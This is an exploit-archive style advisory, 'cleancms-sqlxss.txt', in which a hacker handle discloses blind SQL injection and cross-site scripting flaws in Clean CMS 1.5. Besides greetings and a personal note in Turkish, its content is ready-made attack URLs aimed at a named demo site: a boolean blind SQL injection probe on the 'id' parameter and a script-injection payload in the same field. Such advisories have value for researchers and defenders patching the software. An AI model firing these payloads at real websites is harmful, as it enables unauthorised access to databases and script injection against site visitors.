cleancms-sqlxss.txt

`[~] Clean CMS 1.5 Blind Sql & XSS Multiple Remote Vuln.  
[~]  
[~] script: http://www.4yoursite.nl/script_clean_cms.php  
[~]  
[~] ----------------------------------------------------------  
[~] Discovered By: ZoRLu msn: [email protected]  
[~]  
[~] Home: www.z0rlu.blogspot.com  
[~]  
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (  
[~]  
[~] N0T: RedHaK Kardesime ozel tesekurler.  
[~] -----------------------------------------------------------  
  
exp for demo:  
  
http://www.4yoursite.nl/demo/clean_cms/full_txt.php?id=19+and+substring(@@version,1,1)=4 ( true )  
  
http://www.4yoursite.nl/demo/clean_cms/full_txt.php?id=19+and+substring(@@version,1,1)=3 ( false )  
  
XSS for demo:  
  
http://www.4yoursite.nl/demo/clean_cms/full_txt.php?id="><script>alert()</script>  
  
  
[~]----------------------------------------------------------------------  
[~] Greetz tO: str0ke & RedHaK  
[~]  
[~] yildirimordulari.org & darkc0de.com  
[~]  
[~]----------------------------------------------------------------------  
  
  
`